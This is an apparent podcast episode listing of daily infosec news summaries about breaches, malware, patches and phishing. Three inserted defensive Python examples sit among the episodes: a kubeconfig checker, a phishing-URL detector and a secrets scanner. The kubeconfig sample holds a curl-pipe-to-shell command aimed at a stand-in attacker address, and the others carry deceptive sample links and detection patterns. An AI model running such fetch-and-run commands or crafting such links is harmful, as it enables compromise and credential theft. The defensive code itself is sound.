And last today, from BleepingComputer.com: Windows previewed its upcoming cumulative update, which unfortunately has some compatibility issues with some of Trend Micro's security products, including the ransomware protection feature. The issue affects the User Mode Hooking component used by several Trend Micro endpoint solutions. The company is working on a fix to address this issue before the updates are pushed to all Windows customers as part of their June Patch Tuesday.

That's all for me this week. Have a great holiday weekend. Take a moment to remember those that gave their last full measure to secure the freedoms of the rest of us. And until next time, be safe out there.

InfoSec Overnights - Daily Security News
Chicago students breach, PyPI infection, WordPress backdoor, and more.

InfoSec Overnights - Daily Security News

Play Episode Listen Later May 23, 2022 2:41


A daily look at the relevant information security news from overnight.

Episode 230 - 23 May 2022

Chicago students breach - https://chicago.suntimes.com/education/2022/5/20/23132983/cps-public-schools-data-breach-students-employees-records-battelle-kids
PyPI infection - https://www.bleepingcomputer.com/news/security/malicious-pypi-package-opens-backdoors-on-windows-linux-and-macs/
Record Ethereum bounty - https://portswigger.net/daily-swig/blockchain-bridge-wormhole-pays-record-10m-bug-bounty-reward
PDF snake - https://threatpost.com/snake-keylogger-pdfs/179703/
WordPress backdoor - https://www.bleepingcomputer.com/news/security/backdoor-baked-into-premium-school-management-plugin-for-wordpress/

Hi, I'm Paul Torgersen. It's Monday May 23rd, 2022, and this is a look at the information security news from overnight.

From the Chicago.SunTimes.com: A massive data breach has exposed four years' worth of records of about a half million Chicago Public Schools students and nearly 60,000 employees. The attack targeted a company that provides teacher evaluations and should not contain financial records or Social Security numbers. And in a dose of real world teaching, those students now get a free year of credit and identity theft monitoring.

From BleepingComputer.com: Another malicious Python package has been spotted in the PyPI registry performing supply chain attacks to drop Cobalt Strike malware on Windows, Linux, and macOS systems. The malicious package is named 'pymafka', very similar to PyKafka, a widely used Apache Kafka client that counts over four million downloads. All the details in the article.

From PortSwigger.net: An ethical hacker has earned a record $10 million bug bounty after discovering a critical security vulnerability in the Wormhole core bridge contract on Ethereum. The vulnerability would have allowed the wormhole to be bricked, forever losing the $736 million of assets that were in the contract at the time.

From ThreatPost.com: A malicious email campaign using a weaponized PDF file and a 22-year-old Office bug is propagating the Snake keylogger. It also employs several evasion techniques, such as embedding malicious files, loading remotely-hosted exploits and shellcode encryption. You know where to find the details.

And last this week, from BleepingComputer.com: A backdoor has been discovered in a premium WordPress plugin designed as a complete management solution for schools. The name of the plugin is "School Management," published by Weblizar, and multiple versions before 9.9.7 have the backdoor baked into its code. Although the latest version is clean, the developer did not disclose the source of the compromise.

That's all for me today. Remember to LIKE, SUBSCRIBE, and share with your networks. And as always, until next time, be safe out there.

InfoSec Overnights - Daily Security News
Log4J exploit, SQL brute, Vidar delivery, and more.

InfoSec Overnights - Daily Security News

Play Episode Listen Later May 20, 2022 3:07


A daily look at the relevant information security news from overnight.

Episode 239 - 20 May 2022

Log4J exploit - https://www.bleepingcomputer.com/news/security/lazarus-hackers-target-vmware-servers-with-log4shell-exploits/
SQL brute - https://www.securityweek.com/new-brute-force-attacks-against-sql-servers-use-powershell-wrapper
Phishing with Chat - https://www.bleepingcomputer.com/news/security/phishing-websites-now-use-chatbots-to-steal-your-credentials/
Jupiter flawed - https://threatpost.com/vulnerability-wordpress-themes-site-takeover/179672/
Flux flaw - https://portswigger.net/daily-swig/rogue-cloud-users-could-sabotage-fellow-off-prem-tenants-via-critical-flux-flaw
Vidar delivery - https://www.zdnet.com/article/fake-domains-offer-windows-11-installers-but-deliver-malware-instead/

Hi, I'm Paul Torgersen. It's Friday May 20th, 2022, and after a couple days under the weather, this is a look at the information security news from overnight.

From BleepingComputer.com: The North Korean hacking group Lazarus is exploiting the Log4J remote code execution vulnerability on VMware Horizon servers. They use the weakness to execute a PowerShell command and ultimately install the NukeSped backdoor. Details in the article.

From SecurityWeek.com: Microsoft has warned organizations of a new wave of brute force cyberattacks that target SQL servers and use a living-off-the-land binary. Specifically, the attackers rely on a legitimate utility called sqlps.exe to achieve fileless persistence on SQL servers that use weak or default passwords.

From BleepingComputer.com: Phishing attacks are now using automated chatbots to guide visitors through the process of handing over their login credentials to the threat actors. How nice of them. Actually, the presence of a chatbot lends a sense of legitimacy to the malicious sites. See the full Trustwave report in the article.

From ThreatPost.com: A critical privilege escalation flaw found in two WordPress site themes can allow the threat actors to take over the sites completely. The Jupiter and JupiterX Core Plugin affect more than 90,000 sites. The vulnerability affects Jupiter Theme 6.10.1 or earlier, and JupiterX Core Plugin 2.0.7 or earlier. Updated versions have patched the flaws.

From PortSwigger.net: A critical vulnerability in Flux2, the continuous delivery tool for Kubernetes, can enable rogue tenants in multi-tenancy deployments to sabotage their neighbors that are using the same off-premise infrastructure. The remote code execution flaw arises through improper validation of kubeconfig files, which "can define commands to be executed to generate on-demand authentication tokens". In a single tenant deployment, this flaw is only a 6.8 severity. In multi tenant deployments, that rating jumps to a 9.9.

And last this week, from ZDNet.com: Newly registered domains that just appeared in April mimic a legitimate Microsoft Windows 11 OS download portal. Unfortunately, what you actually get is a nasty little information stealer called Vidar. Link to the full Zscaler report in the article.

That's all for me this week. Remember to LIKE and SUBSCRIBE. And as always, until next time, be safe out there.
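The Flux item above turns on one kubeconfig feature: a user entry can name a command that the client runs to obtain a credential, so a kubeconfig handed over by another tenant is really an instruction to execute a binary on the controller's host. Below is an added example, my own and not Flux's code, of the pre-admission check a platform team can run over tenant-supplied kubeconfigs before they are accepted: it walks every user entry, surfaces `exec` credential plugins and the legacy `auth-provider` command path, and reports anything whose binary is not on an allow-list. The sample kubeconfig, the allow-list contents and the attacker IP (198.51.100.7, a documentation address) are constructed for illustration. The file is given in JSON rather than YAML only so the example needs no third-party parser; kubectl accepts both.

```python
import json
import os

# Constructed sample kubeconfig (JSON form). The second and third users
# carry command hooks: whoever loads this file runs those binaries locally.
SAMPLE_KUBECONFIG = r'''
{
  "apiVersion": "v1",
  "kind": "Config",
  "clusters": [
    {"name": "prod", "cluster": {"server": "https://10.0.0.1:6443"}}
  ],
  "users": [
    {"name": "token-user", "user": {"token": "REDACTED"}},
    {"name": "exec-user", "user": {"exec": {
        "apiVersion": "client.authentication.k8s.io/v1beta1",
        "command": "/bin/sh",
        "args": ["-c", "curl -s http://198.51.100.7/x | sh"]
    }}},
    {"name": "plugin-user", "user": {"auth-provider": {
        "name": "gcp",
        "config": {"cmd-path": "/usr/bin/gcloud"}
    }}}
  ],
  "contexts": [
    {"name": "prod", "context": {"cluster": "prod", "user": "exec-user"}}
  ],
  "current-context": "prod"
}
'''

# Assumption for the example: credential plugins a platform team has vetted.
ALLOWED_EXEC_COMMANDS = frozenset({"aws", "gke-gcloud-auth-plugin", "kubelogin"})


def find_command_hooks(config):
    """Return every place in a parsed kubeconfig that names a command to run.

    Two kubeconfig features do this: the 'exec' credential plugin
    (users[].user.exec.command) and the legacy 'auth-provider' block, whose
    config may carry a 'cmd-path'. Both run as the process loading the file.
    """
    hooks = []
    for entry in config.get("users") or []:
        name = entry.get("name")
        user = entry.get("user") or {}
        exec_cfg = user.get("exec")
        if exec_cfg:
            hooks.append({
                "user": name,
                "kind": "exec",
                "command": exec_cfg.get("command", ""),
                "args": list(exec_cfg.get("args") or []),
            })
        provider = user.get("auth-provider")
        if provider:
            cmd_path = (provider.get("config") or {}).get("cmd-path")
            if cmd_path:
                hooks.append({"user": name, "kind": "auth-provider",
                              "command": cmd_path, "args": []})
    return hooks


def vet_kubeconfig(text, allowlist=ALLOWED_EXEC_COMMANDS):
    """Parse a kubeconfig and return the command hooks that are not allowed.

    Pass an empty allowlist to reject every command hook, which is the right
    default when the kubeconfig comes from another tenant.
    """
    findings = []
    for hook in find_command_hooks(json.loads(text)):
        if os.path.basename(hook["command"]) not in allowlist:
            findings.append(hook)
    return findings


if __name__ == "__main__":
    for f in vet_kubeconfig(SAMPLE_KUBECONFIG, allowlist=frozenset()):
        print(f"{f['user']}: {f['kind']} runs {f['command']} {' '.join(f['args'])}")
```

The check looks at the basename only, so a tenant cannot dodge it with a path like `/tmp/aws`; a stricter deployment would compare the full path against where the vetted plugin is actually installed. In a multi-tenant controller the safe posture is the empty allow-list: no tenant-supplied kubeconfig should be able to make the controller execute anything.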

InfoSec Overnights - Daily Security News
Apple attack, Conti hits Parker, iPhone vuln, and more.

InfoSec Overnights - Daily Security News

Play Episode Listen Later May 17, 2022 2:40


A daily look at the relevant information security news from overnight.

Episode 238 - 17 May 2022

Apple attack - https://www.bleepingcomputer.com/news/security/apple-emergency-update-fixes-zero-day-used-to-hack-macs-watches/
Conti hits Parker - https://www.infosecurity-magazine.com/news/parker-conti-ransomware/
Tesla BLE - https://www.bleepingcomputer.com/news/security/hackers-can-steal-your-tesla-model-3-y-using-new-bluetooth-attack/
Card skimming - https://www.zdnet.com/article/fbi-hackers-used-malicious-php-code-to-grab-credit-card-data/
iPhone vuln - https://threatpost.com/iphones-attack-turned-off/179641/

Hi, I'm Paul Torgersen. It's Tuesday May 17th, 2022, and this is a look at the information security news from overnight.

From BleepingComputer.com: Apple has released security updates to address a zero-day vulnerability that threat actors can exploit in attacks targeting Macs and Apple Watches. The flaw is an out-of-bounds write issue in the AppleAVD, the kernel extension for audio and video decoding. Apple says it is likely this has already been exploited in the wild.

From Infosecurity-magazine.com: US manufacturer Parker-Hannifin has announced a data breach exposing employees' PII after being the target of a Conti ransomware attack. The company said that an unauthorized third party gained access to its IT systems between 11 and 14 of March this year. On the plus side, if your information was involved, you just got two free years of identity theft monitoring.

From BleepingComputer.com: Security researchers at the NCC Group have developed a tool to carry out a Bluetooth Low Energy relay attack that bypasses all existing protections to authenticate on target devices. What target devices, you ask? Teslas. Details in the article.

From ZDNet.com: The FBI put out a warning that someone is scraping credit card data from the checkout pages of US businesses' websites. The bad actor is injecting malicious PHP Hypertext Preprocessor code into the business' online checkout page and sending the scraped data to a server that spoofed a legitimate card processing server. They also left a backdoor into the victims' system.

And last today, from ThreatPost.com: Because of how Apple implements standalone wireless features such as Bluetooth, Near Field Communication and Ultra-wideband technologies, researchers have found that iPhones are vulnerable to malware loading attacks even when the device is turned off. The root cause of the issue is how iPhones implement low power mode for wireless chips. No comment yet from Apple, but there is a link to the research report in the article.

That's all for me today. Remember to LIKE and SUBSCRIBE. And as always, until next time, be safe out there.

InfoSec Overnights - Daily Security News
HP broken BIOS, New Nerbian, Konica cure, and more.

InfoSec Overnights - Daily Security News

Play Episode Listen Later May 12, 2022 2:41


A daily look at the relevant information security news from overnight.

Episode 237 - 12 May 2022

HP broken BIOS - https://www.bleepingcomputer.com/news/security/hp-fixes-bug-letting-attackers-overwrite-firmware-in-over-200-models/
New Nerbian - https://threatpost.com/nerbian-rat-advanced-trick/179600/
Bitter at Bangladesh - https://www.bleepingcomputer.com/news/security/bitter-cyberspies-target-south-asian-govts-with-new-malware/
Fake Vanity - https://portswigger.net/daily-swig/box-zoom-google-docs-offer-phishing-boost-with-vanity-url-flaws
Konica cure - https://www.securityweek.com/konica-minolta-printers-vulnerable-hacking-physical-access

Hi, I'm Paul Torgersen. It's Thursday May 12th, 2022, and this is a look at the information security news from overnight.

From BleepingComputer.com: HP has released BIOS updates to fix two 8.8 severity vulnerabilities that would allow code to run with kernel privileges, and affect over 200 PC and notebook products. The problem appears to be that an SMI handler can be triggered from the OS environment. You can see the details and a couple important links in the article.

From ThreatPost.com: A newly discovered and complex remote access trojan dubbed Nerbian RAT is spreading via malicious email campaigns using COVID-19 as a lure. This multi-feature baddie includes the ability to evade analysis or detection by researchers. The majority of the attacks have been centered in Spain and the United Kingdom.

From BleepingComputer.com: APT cyberespionage group Bitter has been found targeting the government of Bangladesh with new malware with remote file execution capabilities. These messages are sent via spoofed email addresses that appear to come from Pakistani government organizations. This was likely possible by exploiting a flaw in the Zimbra mail server that allows attackers to send messages from a non-existent mail domain. Full details from the Talos research in the article.

From PortSwigger.net: Threat actors are enhancing their phishing campaigns by exploiting a failure to validate subdomains within so-called 'vanity URLs' used in SaaS applications. Apps such as Box, Zoom, and Google Docs validate vanity URLs' URI (the unique sequence of characters at the end of the link), but not its descriptive subdomain, which is the portion preceding the URI.

And last today, from SecurityWeek.com: Hundreds of thousands of Konica printers are vulnerable to hacking via physical access. The vendor produced firmware and operating system patches in early 2020, but details are only being disclosed now because in many cases the patches need to be manually installed by a service technician. That was a bit tough in the midst of the Covid shutdowns.

That's all for me today. Remember to LIKE and SUBSCRIBE. And as always, until next time, be safe out there.

InfoSec Overnights - Daily Security News
Windows zero-days patched, Intel bad memory, @ phishing, and more.

InfoSec Overnights - Daily Security News

Play Episode Listen Later May 11, 2022 3:33


A daily look at the relevant information security news from overnight.

Episode 236 - 11 May 2022

Windows zero-days patched - https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-new-ntlm-relay-zero-day-in-all-windows-versions/
Intel bad memory - https://threatpost.com/intel-memory-bug-poses-risk-for-hundreds-of-products/179595/
Siemens and Schneider patches - https://www.securityweek.com/ics-patch-tuesday-siemens-schneider-electric-address-43-vulnerabilities
IceApple bites - https://www.bleepingcomputer.com/news/security/new-iceapple-exploit-toolset-deployed-on-microsoft-exchange-servers/
Adobe patches - https://www.securityweek.com/adobe-warns-critical-security-flaws-enterprise-products
@ phishing - https://threatpost.com/novel-phishing-trick-uses-weird-links-to-bypass-spam-filters/179587/

Hi, I'm Paul Torgersen. It's Wednesday May 11th, 2022, and this is a look at the information security news from overnight.

From BleepingComputer.com: Microsoft has patched 75 flaws on May's Patch Tuesday, including an actively exploited Windows LSA spoofing zero-day that attackers can exploit remotely to force domain controllers to authenticate them via the Windows NT LAN Manager. This particular bug affects all Windows versions from Windows 7 and Windows Server 2008 through Windows 11 and Windows 2022. Two other zero-days were also addressed in the update.

From ThreatPost.com: Intel is reporting a memory bug impacting microprocessor firmware used in hundreds of products. The vulnerability resides inside some of the Intel Optane SSD and Intel Optane Data Center products, which allows privilege escalation, denial of service, or information disclosure. Details in the article.

From SecurityWeek.com: Schneider Electric has released three advisories to inform customers about eight vulnerabilities, and Siemens has released 12 advisories covering 35 vulnerabilities, including one with a critical severity rating. Details and links to the advisory statements in the article.

From BleepingComputer.com: CrowdStrike researchers have found a new post-exploitation framework that they dubbed IceApple, deployed mainly on Microsoft Exchange servers across a wide geography. This stealthy little framework is .NET-based and comes with at least 18 modules, each for a specific task, that help the attacker discover relevant machines on the network, steal credentials, delete files and directories, or exfiltrate data. Details and a link to download the CrowdStrike report in the article.

From SecurityWeek.com: Adobe used this Patch Tuesday to cover at least 18 serious security defects in multiple enterprise-facing products and warned that unpatched systems are at risk of remote code execution attacks. Link to the advisory in the article, and in what has become a bit of a theme today, get your patch on, kids.

And last today, from ThreatPost.com: Researchers have identified a never-before-seen method for sneaking malicious links into phishing emails. The trick takes advantage of a key difference in how email inboxes and browsers read URLs. Specifically, using an "@" symbol in the middle of the string. Most browsers will either interpret this as authentication information, or simply ignore it and execute whatever follows the symbol. Read about all the dirty tricks in the article.

That's all for me today. Remember to LIKE and SUBSCRIBE. And as always, until next time, be safe out there.
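The "@" trick in the last item works because the URL syntax (RFC 3986) allows an optional `userinfo@` before the host, so everything up to the last "@" in the authority is credentials and the real destination is whatever follows it. A filter that eyeballs the first host-looking text after the scheme is fooled; one that parses the URL the way a browser does is not. The following is an added example, not code from the podcast or the researchers it cites, of that parsing check using Python's standard `urllib.parse`, which applies the same userinfo rule. The sample links are constructed: the hostnames under `.test` and the address 198.51.100.7 are reserved for documentation.

```python
import re
from urllib.parse import urlsplit

# Constructed sample links. The first two use the "@"-in-the-middle trick;
# the third is an ordinary link for comparison.
SAMPLE_LINKS = [
    "https://login.microsoftonline.com@example-attacker.test/owa/",
    "http://www.paypal.com:443@198.51.100.7/signin",
    "https://www.microsoft.com/en-us/security",
]


def effective_host(url):
    """Host a browser actually connects to.

    urlsplit() treats everything before the last '@' in the authority as
    userinfo, exactly as RFC 3986 prescribes, so .hostname is the real target.
    """
    return (urlsplit(url).hostname or "").lower()


def displayed_host(url):
    """Host-looking text a reader scanning left to right takes as the target.

    That is the authority cut at the first '/', ':' or '@', which is what a
    naive regex filter or a human eye extracts.
    """
    return re.split(r"[/:@]", urlsplit(url).netloc, maxsplit=1)[0].lower()


def has_userinfo(url):
    """True when the authority carries a userinfo section at all."""
    return "@" in urlsplit(url).netloc


def classify(url):
    """Report both hosts and flag the link when they disagree."""
    shown, real = displayed_host(url), effective_host(url)
    return {
        "url": url,
        "shown_host": shown,
        "real_host": real,
        "userinfo_trick": has_userinfo(url) and shown != real,
    }


def suspicious_links(urls):
    """Subset of urls whose visible host is not where the browser will go."""
    return [c for c in map(classify, urls) if c["userinfo_trick"]]


if __name__ == "__main__":
    for c in map(classify, SAMPLE_LINKS):
        print(c)
```

Blocking every link with a userinfo section is a defensible rule on a mail gateway; almost no legitimate web link in email carries one. Where that is too blunt, the disagreement between `shown_host` and `real_host` is the signal to act on, since the trick depends on the two differing.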

InfoSec Overnights - Daily Security News
Thumbs suck, New NetDooka, And. And. It's gone, and more.

InfoSec Overnights - Daily Security News

Play Episode Listen Later May 6, 2022 3:08


A daily look at the relevant information security news from overnight.

Episode 234 - 06 May 2022

Thumbs suck - https://threatpost.com/usb-malware-targets-windows-installer/179521/
New NetDooka - https://www.bleepingcomputer.com/news/security/new-netdooka-malware-spreads-via-poisoned-search-results/
CT swipe - https://portswigger.net/daily-swig/wordpress-sites-getting-hacked-within-seconds-of-tls-certificates-being-issued
Android updates - https://www.bleepingcomputer.com/news/security/google-fixes-actively-exploited-android-kernel-vulnerability/
And. And. It's gone - https://www.zdnet.com/article/weird-bug-made-google-docs-crash-if-you-typed-one-word-five-times/

Hi, I'm Paul Torgersen. It's Friday May 6th, 2022, and this is a look at the information security news from overnight.

From ThreatPost.com: A new wormable malware called Raspberry Robin has been active since this past September and is delivered onto Windows machines through USB drives. Do people still do that? Remember when you used to go to a conference, and vendors would hand out thumb drives? Then people would go home and actually stick them into their computer? Don't do that. There is more information in the article, but the answer is: don't do that.

From BleepingComputer.com: A new malware framework known as NetDooka has been discovered being distributed through the PrivateLoader pay-per-install malware distribution service. The framework features a loader, a dropper, a protection driver, and a powerful RAT component that relies on a custom network communication protocol. Researchers at Trend Micro warn that, while the tool is still in an early development phase, it is already very capable. Link to the research in the article.

From PortSwigger.net: Attackers are abusing the Certificate Transparency system to compromise new WordPress sites in the brief window after web admins upload the WordPress files, but before they manage to secure the website with a password. Hackers are evidently monitoring the CT logs because sites are being hacked within minutes, sometimes seconds, of TLS certificates being requested. You know where to find the details.

From BleepingComputer.com: Google has released the second part of their May security patch for Android, including a fix for an actively exploited Linux kernel vulnerability. Do note that if you are using Android 9 or older, this patch does not apply to you and you really should upgrade to a more recent Android OS. Also, if you have a Google Pixel, you have some additional patching to do. Get your patch on, kids.

And last today, from ZDNet.com: An obscure bug is making Google Docs crash after users typed in a simple, repeated word pattern. If you type the word and, with a capital A, and a period and space after it, five times in a row, it would crash your doc. And any attempts to reopen the doc would retrigger the crash. And "and" isn't the only word that triggers this, but not ALL words trigger it. It appears that Google has now fixed the bug, but, but, but but, but beware.

That's all for me today. Remember to LIKE and SUBSCRIBE. And as always, until next time, be safe out there.

The Threatpost Podcast
The State of Secrets Sprawl

The Threatpost Podcast

Play Episode Listen Later May 6, 2022 16:50


Can I tell you a secret? Will you keep it between us? You've probably said this or heard this when it comes to friends and family. However, do you also know that secret keeping, or lack thereof, is one of the biggest issues that businesses face? The recent State of Secrets Sprawl report from GitGuardian further defines the breadth of business secrets: "A secret can be any sensitive data that we want to keep private. When discussing secrets in the context of software development, secrets generally refer to digital authentication credentials that grant access to services, systems and data. These are most commonly API keys, usernames and passwords, or security certificates. Secrets are what tie together different building blocks of a single application by creating a secure connection between each component. Secrets grant access to the most sensitive systems." In this podcast with Mackenzie Jackson, developer advocate at GitGuardian, we dive into the report and also the issues that corporations face with public leaks from groups like Lapsus$ and more, as well as ways that developers can keep their code safe. For the full report, click here.
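The report's definition above is what a secrets scanner has to operationalise: credentials with a recognisable shape (cloud access keys, vendor tokens, private key headers) plus the open-ended class of "anything assigned to a variable called key, token or password". Below is an added example, my own and not GitGuardian's tooling, of the minimal form of that check as it would run in a pre-commit hook over staged text: a few fixed-format rules, then a generic keyword-assignment rule that only fires when the assigned value has high Shannon entropy, so placeholders like `changeme` do not drown the real findings. The source lines it scans are constructed; the AWS key is Amazon's documented example value and the GitHub token is a made-up string in the `ghp_` format. The entropy threshold is an assumption chosen for this sample, not a published constant.

```python
import math
import re
from collections import Counter

# Constructed sample: staged source lines as a pre-commit hook would see them.
SAMPLE_SOURCE = '''\
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
GITHUB_TOKEN = "ghp_abcdefghijklmnopqrstuvwxyz0123456789"
db_password = "changeme"
API_KEY = "sk_live_9vXq2rT7kLm4Pz8wAq1Yn3Bd"
-----BEGIN RSA PRIVATE KEY-----
label = "development"
'''

# Fixed-format credentials: a match is a finding regardless of context.
SPECIFIC_RULES = [
    ("aws-access-key-id", re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")),
    ("github-token", re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b")),
    ("private-key", re.compile(r"-----BEGIN (?:[A-Z]+ )*PRIVATE KEY-----")),
]

# Keyword assignment: <something like key/secret/token/password> = "value".
GENERIC_ASSIGNMENT = re.compile(
    r"""(?i)(api[_-]?key|secret|token|password|passwd)\w*\s*[:=]\s*["']([^"']{8,})["']"""
)
ENTROPY_THRESHOLD = 3.5  # assumption: bits per character; tune on your own corpus


def shannon_entropy(s):
    """Bits of entropy per character; random-looking keys score high."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def redact(value):
    """Keep a short prefix so a finding is recognisable without re-leaking it."""
    return value[:4] + "*" * max(0, len(value) - 4)


def scan_text(text):
    """Return findings for each line; specific rules win over the generic one."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hit = False
        for name, rx in SPECIFIC_RULES:
            m = rx.search(line)
            if m:
                findings.append({"line": lineno, "rule": name, "match": redact(m.group(0))})
                hit = True
        if hit:
            continue
        m = GENERIC_ASSIGNMENT.search(line)
        if m:
            value = m.group(2)
            ent = shannon_entropy(value)
            if ent >= ENTROPY_THRESHOLD:
                findings.append({"line": lineno, "rule": "generic-high-entropy",
                                 "match": redact(value), "entropy": round(ent, 2)})
    return findings


if __name__ == "__main__":
    for f in scan_text(SAMPLE_SOURCE):
        print(f)
```

The entropy gate is what keeps the generic rule usable: `changeme` scores about 2.75 bits per character and is skipped, while the live-looking API key scores above 4.5 and is reported. Real scanners add many more fixed-format rules and, crucially, verify candidates against the issuing service so that a finding means "valid credential" rather than "matches a regex".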

InfoSec Overnights - Daily Security News
Cyberpunk Ape caper, Windows log trojan, NHS phish, and more.

InfoSec Overnights - Daily Security News

Play Episode Listen Later May 5, 2022 3:14


A daily look at the relevant information security news from overnight.

Episode 233 - 05 May 2022

Cyberpunk Ape caper - https://www.bleepingcomputer.com/news/security/pixiv-deviantart-artists-hit-by-nft-job-offers-pushing-malware/
Windows log trojan - https://www.securityweek.com/kaspersky-warns-fileless-malware-hidden-windows-event-logs
F5 RCE bug - https://threatpost.com/f5-critical-bugbig-ip-systems/179514/
More Cisco bugs - https://www.zdnet.com/article/vm-escape-and-root-access-bugs-fixed-in-cisco-nfv-infrastructure-software/
NHS phish - https://www.bleepingcomputer.com/news/security/attackers-hijack-uk-nhs-email-accounts-to-steal-microsoft-logins/

InfoSec Overnights - Daily Security News
Exchange exfil, uClibc needs uHelp, Moshen Dragon rears up, and more.

InfoSec Overnights - Daily Security News

Play Episode Listen Later May 3, 2022 2:37


A daily look at the relevant information security news from overnight.

Episode 231 - 03 May 2022

Exchange exfil - https://www.bleepingcomputer.com/news/security/cyberspies-use-ip-cameras-to-deploy-backdoors-steal-exchange-emails/
uClibc needs uHelp - https://www.securityweek.com/many-iot-devices-exposed-attacks-due-unpatched-flaw-uclibc-library
SMTP sidestep - https://www.bleepingcomputer.com/news/security/google-smtp-relay-service-abused-for-sending-phishing-emails/
Kellogg Community Closed - https://www.battlecreekenquirer.com/story/news/2022/05/02/ransomware-attack-forces-kcc-cancel-classes-indefinitely/9612941002/
Moshen Dragon rears up - https://www.bleepingcomputer.com/news/security/chinese-cyber-espionage-group-moshen-dragon-targets-asian-telcos/

InfoSec Overnights - Daily Security News
REvil revived, Synology warning, Three Frogs, and more.

InfoSec Overnights - Daily Security News

Play Episode Listen Later Apr 29, 2022 2:56


A daily look at the relevant information security news from overnight.

Episode 229 - 29 April 2022

REvil revived - https://www.techtarget.com/searchsecurity/news/252516434/REvil-ransomware-attacks-resume-but-operators-are-unknown
Synology warning - https://www.bleepingcomputer.com/news/security/synology-warns-of-critical-netatalk-bugs-in-multiple-products/
Phishing RedLine - https://www.zdnet.com/article/this-phishing-campaign-delivers-malware-that-steals-your-passwords-and-chat-logs/
DDoS Ukraine - https://www.bleepingcomputer.com/news/security/ukraine-targeted-by-ddos-attacks-from-compromised-wordpress-sites/
Three Frogs - https://threatpost.com/apt-id-3-separate-actors/179435/

InfoSec Overnights - Daily Security News
Bumblebee sting, Russian attacks, Black Basta rises, and more.

Apr 28, 2022 · 2:29


A daily look at the relevant information security news from overnight.
Episode 228 - 28 April 2022
Bumblebee sting - https://www.bleepingcomputer.com/news/security/new-bumblebee-malware-takes-over-bazarloaders-ransomware-delivery/
Russian attacks - https://www.zdnet.com/article/microsoft-russia-has-launched-hundreds-of-cyberattacks-against-ukraine/
QNAP snap - https://www.bleepingcomputer.com/news/security/qnap-warns-users-to-disable-afp-until-it-fixes-critical-bugs/
GitHub flub - https://threatpost.com/github-repos-stolen-oauth-tokens/179427/
Journalists phished - https://threatpost.com/hackers-target-journalists-goldbackdoor/179389/
Black Basta rises - https://www.bleepingcomputer.com/news/security/new-black-basta-ransomware-springs-into-action-with-a-dozen-breaches/

The Threatpost Podcast
Killing Cloud Risk by Bulletproofing App Security: Podcast

Feb 16, 2022 · 25:08


Applications are the most preferred vectors for cybercriminals. Yet no single team or process can assure the rollout of safe cloud applications. From code design to unit testing to deployment, teams and tools have to work together to detect risks early while keeping the pipeline of digital products moving.

Alex Rice, CTO at HackerOne, and Johnathan Hunt, VP of Security at GitLab, help development teams evolve their processes to build security directly into their workflows for smooth and safe cloud app rollouts. They dropped by the Threatpost podcast recently to share tips on DevSecOps, including:

• How to build continual testing, monitoring, and feedback processes to drive down application risk.
• Developing a continuous approach to application security and DevOps security tools.
• Why collaboration and continual feedback are essential across development, cloud and security teams.

…as well as how to deal with the boatload of animosity between development and security teams. One tip: Assume positive intent!

The Threatpost Podcast
How to Buy Precious Patching Time as Log4j Exploits Fly

Dec 14, 2021 · 19:56


Threatpost podcast: Cybereason CTO Yonatan Striem-Amit shares details about the company's vaccine: a fast shot in the arm released within hours of the Apache Log4j zero-day horror show having been disclosed.

CyberAware Podcast
Entering the Cybersecurity Field with Dr. Michael Hart (Season Finale)

Dec 8, 2021 · 35:57


Looking to break into the field of cybersecurity? Special guest Dr. Michael Hart, Assistant Professor of Computer Information Science at Minnesota State University, Mankato, gives his best advice! Nathan sits down with Dr. Hart to chat about the job market, skills needed for the field, recommended coursework, degrees, and certifications, and a plethora of other resources to get started. Plan your path to landing your dream cybersecurity career! This episode concludes with news stories including a data breach at electronics company Panasonic and a cyberattack on Ohio-based DNA Diagnostics Center.

News Sources:
Story 1: Seals, Tara. "Panasonic's Data Breach Leaves Open Questions." Threatpost, 30 November 2021, https://threatpost.com/panasonic-data-breach-questions/176660/
Story 2: Toulas, Bill. "DNA Testing Firm Discloses Data Breach Affecting 2.1 Million People." Bleeping Computer, 30 November 2021, https://www.bleepingcomputer.com/news/security/dna-testing-firm-discloses-data-breach-affecting-21-million-people/

CyberAware Podcast
The Wild World of Cybercrime

Dec 1, 2021 · 13:28


The internet took the world by storm, and with it came a variety of cybercrimes that you should know about. From identity theft to cyber stalking, Ham and Nathan run through some of the most common cybercrimes that affect millions of people a year. Learn top risks to look out for in order to avoid falling victim to criminals. This episode concludes with news from expert Mercy, including a recent cyberattack on wind turbine manufacturer Vestas Wind Systems, a confirmed data breach on internet domain registrar GoDaddy, and an up and coming TSA PreCheck membership scam.

News Sources:
Story 1: Toulas, Bill. "Wind Turbine Giant Vestas' Data Compromised in Cyberattack." Bleeping Computer, 22 November 2021, https://www.bleepingcomputer.com/news/security/wind-turbine-giant-vestas-data-compromised-in-cyberattack/
Story 2: Seals, Tara. "GoDaddy's Latest Breach Affects 1.2M Customers." Threatpost, 22 November 2021, https://threatpost.com/godaddys-latest-breach-customers/176530/
Story 3: Toulas, Bill. "Fake TSA PreCheck Sites Scam US Travelers with Fake Renewals." Bleeping Computer, 19 November 2021, https://www.bleepingcomputer.com/news/security/fake-tsa-precheck-sites-scam-us-travelers-with-fake-renewals/

CyberAware Podcast
What is Cryptocurrency?

Nov 24, 2021 · 12:27


Whether you're an aspiring crypto enthusiast, a skeptic, or just plain curious – learn the basics of what cryptocurrency is and some of the potential risks. Find out what crypto coins really are, some interesting examples, and how they're used. From Bitcoin to Dogecoin, Nathan and Ham walk you through this intriguing world with basic facts and personal anecdotes. Plus, find out top risks you should watch out for, including scams, cryptojacking, and mining. This episode concludes with news from expert Mercy, including a TikTok scam targeting influencers, an update on the Robinhood data breach, and hundreds of WordPress sites hacked for a cryptocurrency ransom.

News Sources:
Story 1: Montalbano, Elizabeth. "Phishing Scam Aims to Hijack TikTok 'Influencer' Accounts." Threatpost, 17 November 2021, https://threatpost.com/phishing-scam-tiktok-influencer/176391/
Story 2: Abrams, Lawrence. "7 Million Robinhood User Email Addresses for Sale on Hacker Forum." Bleeping Computer, 15 November 2021, https://www.bleepingcomputer.com/news/security/7-million-robinhood-user-email-addresses-for-sale-on-hacker-forum/
